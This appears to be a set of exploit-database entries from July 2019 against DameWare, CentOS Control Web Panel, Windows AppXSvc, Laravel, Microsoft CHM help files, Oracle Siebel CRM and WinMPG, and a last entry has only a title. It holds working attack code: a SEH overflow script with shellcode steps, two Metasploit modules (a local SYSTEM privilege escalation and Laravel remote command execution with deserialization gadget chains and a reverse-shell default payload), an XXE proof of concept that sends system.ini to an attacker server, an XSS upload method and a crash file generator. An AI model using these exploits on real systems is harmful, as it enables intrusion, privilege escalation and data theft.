#!/usr/bin/env python # Author: Xavi Beltran # Date: 11/07/2019 # Description: # SEH based Buffer Overflow # DameWare Remote Support V. 12.0.0.509 # CVE-2018-12897 # Contact: [email protected] # Webpage: https://xavibel.com # Tested on: Windows XP SP3 ESP # Credit for Adam Jeffreys from Nettitude! :) # Usage: # Right click on a host >> AMT >> AMT Settings dialog # Mark "Use SOCKS proxy" box # Paste the string in the Host field junk = "\x41" * 1672 # Unicode compatible padding nseh = "\x61\x43" # 007A007B - POP POP RET seh = "\x7B\x7A" align = "" align += "\x05\x20\x11" # add eax,0x11002000 align += "\x71" # Venetian Padding align += "\x2d\x19\x11" # sub eax,0x11001900 align += "\x71" # Venetian Padding align += "\x50" # push eax align += "\x71" # Venetian Padding align += "\xC3" # RETN padding = "\x41" * 11 junk2 = "\x41" * 870 junk3 = "\x41" * 2014 # msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw # ./alpha2 eax --unicode --uppercase < shellcode.raw # 508 bytes shellcode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crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3 print(crash)
-
CentOS Control Web Panel 0.9.8.838 - User Enumeration
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: 0.9.8.836 to 0.9.8.847
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================
Product : CWP Control Web Panel
version : 0.9.8.838
Fixed on : 0.9.8.848
Test on : CentOS 7.6.1810 (Core)
Reference : https://control-webpanel.com/
CVE-Number : 2019-13383

# ====================================================================
# Root cause of the vulnerability
# ====================================================================
The server responds with a different message depending on whether the login used a valid or an invalid user. This allows attackers to check whether a username is valid by reading the HTTP response.

# ====================================================================
# Steps to Reproduce
# ====================================================================
1. Login with a random user by using invalid password

POST /login/index.php?acc=validate HTTP/1.1
Host: 192.168.80.137:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Referer: https://192.168.80.137:2083/login/?acc=logon

username=AAA&password=c2Rmc2Rm

2. Check the HTTP response body

2.1 User does not exist (server response "suspended")

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9

suspended

2.2 User does exist (server responds with nothing)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0

3. HTTP response body format depends on software version, but all of them keep responding differently, as in the example below

------------------------------------------------------------
| Username | Password | Result                   |
------------------------------------------------------------
| valid    | valid    | login success            |
| valid    | invalid  | {"error":"failed"}       |
| invalid  | invalid  | {"error":"user_invalid"} |
------------------------------------------------------------

# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md

# ====================================================================
# Timeline
# ====================================================================
2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published

# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak
-
Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for CVE-2019-0841 (AppXSvc hard-link handling).
#
# Flow as implemented in #exploit: upload a helper binary, use it to create a
# hard link from the per-user Edge Settings.dat to %WINDIR%\system32\license.rtf,
# launch Edge (presumably so AppXSvc touches the linked file -- the module
# does not state this explicitly), overwrite license.rtf with the generated
# payload DLL, then run a second helper that asks the DiagHub service to load
# "license.rtf".
#
# Defensive notes grounded in this module: #check treats build 17763 and later
# as not affected; a SYSTEM-owned file under system32 (license.rtf here) being
# rewritten by a non-admin session, and the DiagHub collector service loading a
# DLL from that path, are the observable side effects.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::FileInfo
  include Exploit::FileDropper

  # Module metadata: a single 'Windows 10' target, no platform-specific options.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AppXSvc Hard Link Privilege Escalation',
      'Description'    => %q( There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM. ),
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Nabeel Ahmed',  # Vulnerability discovery and PoC
        'James Forshaw', # Code creating hard links and communicating with DiagHub service
        'Shelby Pace'    # Metasploit module
      ],
      'References'     => [
        [ 'CVE', '2019-0841' ],
        [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
        [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
        [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
        [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
      ],
      'Targets'        => [
        [ 'Windows 10', { 'Platform' => 'win' } ]
      ],
      'DisclosureDate' => '2019-04-09',
      'DefaultTarget'  => 0
    ))
  end

  # Returns CheckCode::Unknown when the session's OS string does not look like
  # Windows 10, CheckCode::Appears when win32k.sys reports a build below 17763,
  # and CheckCode::Detected otherwise (Windows 10 at or above the fixed build).
  #
  # NOTE(review): file_version's result is destructured without a nil guard; if
  # it returns nil (file unreadable) the `build < 17763` comparison raises
  # NoMethodError instead of returning a CheckCode. Only `build` is used of the
  # five values; the rest could be `_`.
  def check
    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i

    path = expand_path('%WINDIR%\\system32\\win32k.sys')
    major, minor, build, revision, brand = file_version(path)
    return CheckCode::Appears if build < 17763

    CheckCode::Detected
  end

  # Reads +file_name+ from the module's data directory
  # (data/exploits/CVE-2019-0841/) and writes it to +file_path+ on the target,
  # registering the remote file for cleanup.
  #
  # NOTE(review): the bare `rescue` (StandardError) also catches local errors --
  # the data file missing, or a nil +file_name+ making File.join raise
  # TypeError -- yet every case is reported as a failed write to the target.
  # Reading the local file outside the rescue would keep the message accurate.
  def upload_file(file_name, file_path)
    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
    write_file(file_path, contents)
    register_file_for_cleanup(file_path)
  rescue
    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
  end

  # Starts Microsoft Edge minimized via its protocol handler. The third
  # cmd_exec argument (30) is the command timeout in seconds.
  def init_process
    print_status("Attempting to launch Microsoft Edge minimized.")
    cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
  end

  # Runs the uploaded link helper +link_exe+ to hard-link +target+ to +src+.
  # Success is inferred solely from the substring 'Done' in the helper's output.
  # The explicit `return (...)` is redundant in Ruby (style).
  def mk_hard_link(src, target, link_exe)
    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
    return (out && out.include?('Done'))
  end

  # Saves the current contents of @rtf_path into @original_data (so #cleanup can
  # restore them) and overwrites the file with the generated payload DLL.
  # Requires @rtf_path to have been set by #exploit.
  def write_payload
    print_status('Writing the payload to disk')
    code = generate_payload_dll
    @original_data = read_file(@rtf_path)
    write_file(@rtf_path, code)
  end

  # Entry point. Fails early when the OS is not Windows 10 or the session is
  # already SYSTEM, then performs the link / overwrite / DiagHub-load sequence
  # described on the class.
  #
  # NOTE(review): when session.arch is neither ARCH_X86 nor ARCH_X64, exe_name
  # and f_name stay nil and the failure only surfaces inside upload_file with a
  # misleading message; an explicit `else fail_with(Failure::NoTarget, ...)`
  # branch would report the unsupported architecture directly.
  def exploit
    vuln_status = check
    fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?

    # Edge must not be holding Settings.dat open while the link is created.
    cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
    dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
    fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)

    if session.arch == ARCH_X86
      exe_name = 'CVE-2019-0841_x86.exe'
      f_name = 'diaghub_load_x86.exe'
    elsif session.arch == ARCH_X64
      exe_name = 'CVE-2019-0841_x64.exe'
      f_name = 'diaghub_load_x64.exe'
    end

    # 6...8 is an exclusive range: the random name is 6 or 7 characters long.
    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
    upload_file(exe_name, link_file_name)

    @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
    fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
    print_good('Successfully created hard link')

    init_process
    cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
    write_payload

    diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
    upload_file(f_name, diaghub_path)
    # The helper is given the bare file name; it is expected to resolve it
    # under system32 itself (not shown here -- see the data directory binary).
    cmd = "\"#{diaghub_path}\" \"license.rtf\""
    cmd_exec(cmd)
  end

  # Removes the %TEMP%\etw folder and restores license.rtf from @original_data,
  # then defers to FileDropper for the registered uploads.
  #
  # NOTE(review): cleanup runs on every exit path, including failures that
  # happen before #write_payload sets @rtf_path / @original_data; in that case
  # write_file is called with nil arguments. Guarding the restore with
  # `if @rtf_path && @original_data` avoids a secondary error masking the real one.
  def cleanup
    folder_path = expand_path("%TEMP%\\etw")
    dir_rm(folder_path)
    write_file(@rtf_path, @original_data)
    super
  end
end
-
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# CVE-2018-15133: unauthenticated command execution in Laravel 5.5.40 and
# 5.6.x <= 5.6.29 through the X-XSRF-TOKEN header, which the framework decrypts
# and then unserializes. Exploitation needs the application's APP_KEY;
# #check_appkey takes it from the datastore or tries to recover it from the two
# information leaks this module knows (#env_leak, #framework_leak).
#
# Defensive notes grounded in this module: the References point at the 5.6.30
# upgrade that removes the unserialize path; a web-readable /.env or a verbose
# framework error page exposes APP_KEY, and a key that has been exposed should
# be rotated since every token built with it is forgeable. The request shape
# this module sends -- POST to index.php with an X-XSRF-TOKEN that is a base64
# JSON {"iv","value","mac"} envelope -- is what a WAF or log review would see.
#
# NOTE(review): Msf::Exploit::Remote::Tcp appears unused; every request here
# goes through HttpClient's send_request_cgi.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and the two options: TARGETURI (webroot path) and APP_KEY
  # (optional; when empty the leaks are tried).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Laravel Framework token Unserialize Remote Command Execution',
      'Description'    => %q{ This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation. },
      'DisclosureDate' => '2018-08-07',
      'Author'         => [
        'Ståle Pettersen', # Discovery
        'aushack', # msf exploit + other leak
      ],
      'References'     => [
        ['CVE', '2018-15133'],
        ['CVE', '2017-16894'],
        ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
        ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
        ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
      ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'DefaultTarget'  => 0,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
      'Payload'        => { 'DisableNops' => true },
      'Targets'        => [[ 'Automatic', {} ]],
    ))

    register_options([
      OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
      OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
    ])
  end

  # Fingerprints Laravel by its cookie/header names, obtains a key, then sends
  # an `echo <random>` token for each of the four gadget chains and looks for
  # the random string in the response.
  #
  # Returns Unknown (no Laravel markers or connection error), Detected (Laravel
  # seen but no usable key, or no chain echoed), Vulnerable (echo reflected) or
  # Safe ('Method Not Allowed' seen -- the author notes this is not conclusive).
  #
  # NOTE(review): inside the loop `res.body` is dereferenced without a nil
  # check; send_request_cgi returns nil on a read timeout, which raises
  # NoMethodError here and is not covered by the `rescue Rex::ConnectionError`
  # below. `next unless res && res.body` would keep the loop going.
  # `"#{vuln}"` is a redundant interpolation of a String (style).
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET'
    })

    # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
    unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
      return CheckCode::Unknown
    end

    auth_token = check_appkey
    if auth_token.blank? || test_appkey(auth_token) == false
      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
      return CheckCode::Detected
    end

    random_string = Rex::Text.rand_text_alphanumeric(12)
    1.upto(4) do |method|
      vuln = generate_token("echo #{random_string}", auth_token, method)
      res = send_request_cgi({
        'uri'     => normalize_uri(target_uri.path, 'index.php'),
        'method'  => 'POST',
        'headers' => {
          'X-XSRF-TOKEN' => "#{vuln}",
        }
      })
      if res.body.include?(random_string)
        return CheckCode::Vulnerable
      # Not conclusive but witnessed in the wild
      elsif res.body.include?('Method Not Allowed')
        return CheckCode::Safe
      end
    end
    CheckCode::Detected
  rescue Rex::ConnectionError
    CheckCode::Unknown
  end

  # CVE-2017-16894: fetches /.env and extracts the value after `APP_KEY=base64:`.
  # Returns the key, or '' when the file is absent or holds no such line.
  #
  # NOTE(review): `(.*)` captures to end of line, so on a CRLF body $1 may carry
  # a trailing "\r" -- TODO confirm; a `.strip` would be cheap insurance.
  # The `if key` branch is always taken once the regex matched, so the
  # "didn't find a suitable APP_KEY" status below is effectively unreachable.
  def env_leak
    key = ''
    vprint_status 'Checking for CVE-2017-16894 .env information leak'
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, '.env'),
      'method' => 'GET'
    })
    # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
    return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
    key = $1
    if key
      vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
      return key
    end
    vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
    key
  end

  # Tries to read APP_KEY out of a verbose framework error page.
  #
  # With decrypt_ex = true a one-character X-XSRF-TOKEN is sent, hoping for a
  # DecryptException page; with false a plain POST is sent, hoping for a
  # MethodNotAllowedHttpException page. Either page is expected to dump the
  # environment, and only APP_KEY is expected to appear as a `base64:` value
  # inside a <span>. Returns the key or ''.
  def framework_leak(decrypt_ex = true)
    key = ''
    if decrypt_ex
      # Possible config error / 0day found by aushack during pentest
      # Seen in the wild with recent releases
      res = send_request_cgi({
        'uri'     => normalize_uri(target_uri.path, 'index.php'),
        'method'  => 'POST',
        'headers' => {
          'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
        }
      })
      return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
    else
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'POST'
      })
      return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
    end
    # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
    # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
    if res.body =~ /\>base64:(.*)\<\/span\>/
      key = $1
      vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
    end
    key
  end

  # Resolves the key to use: the APP_KEY datastore option if set, otherwise the
  # leaks in order (.env, DecryptException page, MethodNotAllowed page).
  # Returns the key String, or false when nothing was found; callers test the
  # result with `.blank?`, which is true for false as well as ''.
  def check_appkey
    key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
    return key unless key.empty?
    vprint_status 'APP_KEY not set. Will try to find it...'
    key = env_leak
    key = framework_leak if key.empty?
    key = framework_leak(false) if key.empty?
    key.empty? ? false : key
  end

  # True when +value+ base64-decodes to exactly 32 bytes, i.e. an AES-256 key,
  # which is the only size #generate_token's hard-coded cipher accepts; a
  # 16-byte (AES-128) key is rejected here rather than failing in OpenSSL.
  # `.to_i` on an Integer and the callers' `== false` are redundant (style).
  def test_appkey(value)
    value = Rex::Text.decode_base64(value)
    return true if value && value.length.to_i == 32
    false
  end

  # Builds an X-XSRF-TOKEN value carrying +cmd+ via gadget chain +method+ (1-4,
  # ported from phpggc) and wraps it the way Laravel's Encrypter expects:
  # AES-256-CBC encrypt the serialized object, base64 the ciphertext and IV,
  # HMAC-SHA256 over iv+value with the raw key, JSON-encode, base64 again.
  #
  # The MAC is computed over the unescaped base64 strings and slashes are
  # escaped afterwards only in the JSON text (as PHP's json_encode does), so
  # the server's json_decode yields exactly the iv/value the MAC covers.
  #
  # NOTE(review): `cmd.length` counts characters while PHP's `s:N:` prefix is a
  # byte count; a payload containing non-ASCII bytes would produce a malformed
  # serialized string. `cmd.bytesize` would be the safe choice. An unknown
  # +method+ leaves payload_decoded nil and cipher.update would raise.
  def generate_token(cmd, key, method)
    # Ported phpggc Laravel RCE php objects :)
    case method
    when 1
      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
    when 2
      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
    when 3
      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
    when 4
      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
    end
    cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
    cipher.encrypt
    cipher.key = Rex::Text.decode_base64(key)
    iv = cipher.random_iv
    value = cipher.update(payload_decoded) + cipher.final
    pload = Rex::Text.encode_base64(value)
    iv = Rex::Text.encode_base64(iv)
    mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
    iv = iv.gsub('/', '\\/') # Escape slash
    pload = pload.gsub('/', '\\/') # Escape slash
    json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
    json_out = Rex::Text.encode_base64(json_value)
    json_out
  end

  # Entry point: obtains the key, then tries each gadget chain in turn with the
  # encoded payload, stopping as soon as a session is created. The `5` passed
  # to send_request_cgi is a short response timeout, since a successful payload
  # keeps the request hanging.
  #
  # NOTE(review): `res.body.include?('The MAC is invalid|Method Not Allowed')`
  # looks for that literal string, pipe included, so it never matches either
  # message and the "patched or immune" status is never printed. The intent
  # reads as a regex: `res.body =~ /The MAC is invalid|Method Not Allowed/`.
  def exploit
    auth_token = check_appkey
    if auth_token.blank? || test_appkey(auth_token) == false
      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
      return
    end

    1.upto(4) do |method|
      sploit = generate_token(payload.encoded, auth_token, method)
      res = send_request_cgi({
        'uri'     => normalize_uri(target_uri.path, 'index.php'),
        'method'  => 'POST',
        'headers' => {
          'X-XSRF-TOKEN' => sploit,
        }
      }, 5)
      # Stop when one of the deserialization attacks works
      break if session_created?
      if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
        print_status 'Target appears to be patched or otherwise immune'
      end
    end
  end
end
-
Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass this program and create them easily by simply adding a double .chm extension to the file (".chm.chm"). Compiled HTML Help "hh.exe" will then respect and open it, processing any JS/HTML/XML inside, etc. Compiled HTML Help is also vulnerable to XML External Entity attacks, allowing remote attackers to steal and exfiltrate local system files.

What is interesting about this one is that we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While CHM is already considered a "dangerous" file type and other types of attacks have already been documented, I thought this was an interesting way to create "uncompiled" CHM files, bypassing the default creation steps, while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.
[Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <HTML> <HEAD> <Title>Uncompiled CHM File XXE PoC</Title> </HEAD> <BODY> <xml> <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE tastyexploits [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </BODY> </HTML> 3) "payload.dtd" (hosted in python web-server dir port 81 above) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting # Date: 2019-07-17 # Exploit Author: Sarath Nair aka AceNeon13 # Contact: @AceNeon13 # Vendor Homepage: www.oracle.com # Software Link: https://www.oracle.com/applications/siebel/ # Version: Siebel CRM (UI Framework) Version 19.0 and prior # CVE: N/A # Greetings: Deepu.tv # PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload ----------------------------------------------------------------------- Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View #Steps to exploit the issue: #1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’. #2. Edit one of the existing activity, or create a new one. #3. Use the ‘New File’ menu in ‘attachments’ section to upload an HTML file with JavaScript payload (via a proxy tool). #4. JavaScript payload will be triggered/rendered upon the victim user views the attached file. # Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack. # Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system. 
# Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019 ######################################## # Vulnerability Disclosure Timeline: 2017-December-23: Discovered vulnerability 2017-December-25: Vendor Notification 2017-December-27: Vendor Response/Feedback 2019-July-16: Vendor Fix/Patch 2019-July-17: Public Disclosure ######################################## Warm regards, Sarath Nair
-
WinMPG iPod Convert 3.0 - 'Register' Denial of Service
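# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
# Date: 2019-07-16
# Vendor Homepage:http://www.winmpg.com
# Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
# Exploit Author: stresser
# Tested Version: 3.0
# Tested on: Windows XP SP3 EN
# 1.- Run python code :WinMPG.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open WinMPG and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
# 5.- Click 'Ok'and you will see a crash.
#!/usr/bin/env python

# Length of the crash string. The advisory's only finding is that a 6000-byte
# value in the 'Register' field crashes the application (presumably an
# unchecked input length -- the advisory does not analyse the root cause).
BUFFER_SIZE = 6000
buffer = "\x41" * BUFFER_SIZE


def write_payload(path="Evil.txt", data=buffer):
    """Write ``data`` to ``path`` and return the number of characters written.

    The ``with`` block closes the file even when the write fails (the original
    left it open on error). IOError/OSError propagate so the caller decides
    how to report them.
    """
    with open(path, "w") as handle:
        handle.write(data)
    return len(data)


if __name__ == "__main__":
    try:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        write_payload()
        print("[+] File created!")
    except (IOError, OSError):
        # Narrowed from a bare `except:`, which also swallowed KeyboardInterrupt
        # and any NameError/typo in the body.
        print("File cannot be created")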
-
MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow
